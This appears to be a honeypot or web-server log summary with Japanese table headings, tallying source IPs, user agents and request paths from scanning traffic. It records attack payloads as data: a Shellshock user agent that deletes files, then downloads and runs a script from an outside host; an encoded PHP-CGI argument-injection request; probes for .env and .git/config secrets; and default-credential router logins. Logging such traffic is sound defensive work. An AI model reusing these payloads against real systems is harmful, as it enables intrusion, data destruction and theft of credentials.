1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
1	POST	//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0
1	t3	`12.1.2\n`

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.3.241.148	United States
2	31.220.3.140	Germany
1	36.99.136.137	China
1	42.233.183.210	China
1	45.56.108.128	United States
3	45.79.172.21	United States
4	74.82.47.3	United States
2	83.97.73.245	Germany
1	89.190.156.234	United States
6	94.156.65.188	Bulgaria
8	95.214.235.169	Ukraine
2	104.243.46.110	United States
1	137.184.255.42	United States
2	162.142.125.213	United States
4	164.52.0.94	China
50	165.22.102.105	United States
2	167.94.146.56	United States
2	167.248.133.125	United States
2	170.64.155.189	United States
1	170.64.183.194	United States
2	170.64.193.165	United States
2	170.64.214.87	United States
2	172.105.128.11	United States
1	172.210.76.140	France
3	178.79.158.167	United States
2	183.136.225.9	China
2	185.161.248.148	United Kingdom
1	185.180.143.49	Portugal
2	185.180.143.137	Portugal
1	185.216.71.4	Bulgaria
1	185.224.128.10	Netherlands
2	185.255.112.175	Germany
1	192.241.200.70	United States
2	198.235.24.137	United States
2	205.210.31.177	United States

UserAgent一覧

件数	UserAgent
1	`() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http[:]//192[.]3[.]152[.]183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh`
29	`-`
5	`Go-http-client/1.1`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
50	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
13	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x03`
2		`\x16\x03\x01\x02`
19		`\x16\x03\x01`
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
13	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env%20`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/administrator/.env%20`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api2/.env`	HTTP/1.1
1	GET	`/api3/.env`	HTTP/1.1
1	GET	`/app/.env%20`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/asset/.env`	HTTP/1.1
1	GET	`/assets/.env%20`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/test.cgi`	HTTP/1.1
1	GET	`/clientes/.env`	HTTP/1.1
1	GET	`/clientes/laravel/.env`	HTTP/1.1
1	GET	`/clientes/laravel_inbox/.env`	HTTP/1.1
1	GET	`/club/.env`	HTTP/1.1
1	GET	`/config/.env%20`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/core/Database/.env%20`	HTTP/1.1
1	GET	`/core/app/.env`	HTTP/1.1
1	GET	`/cron/.env`	HTTP/1.1
1	GET	`/cronlab/.env`	HTTP/1.1
1	GET	`/database/.env%20`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
1	GET	`/en/.env%20`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fileweb/.env`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/home/.env`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/l53/.env`	HTTP/1.1
1	GET	`/lab/.env%20%20`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/lib/.env%20`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/main/.env`	HTTP/1.1
1	GET	`/pemerintah/.env`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/public/.env%20`	HTTP/1.1
1	GET	`/resources/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/sistema/.env`	HTTP/1.1
1	GET	`/site/.env%20`	HTTP/1.1
1	GET	`/sitemaps/.env%20`	HTTP/1.1
1	GET	`/static../.git/config`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/tools/.env`	HTTP/1.1
1	GET	`/uploads/.env%20`	HTTP/1.1
1	GET	`/v1/.env%20`	HTTP/1.1
1	GET	`/vendor/.env%20`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/web/.env%20`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/webs/.env`	HTTP/1.1
1	GET	`/website/.env`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/plugins/.git/config`	HTTP/1.1
1	GET	`/zabbix/favicon.ico`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0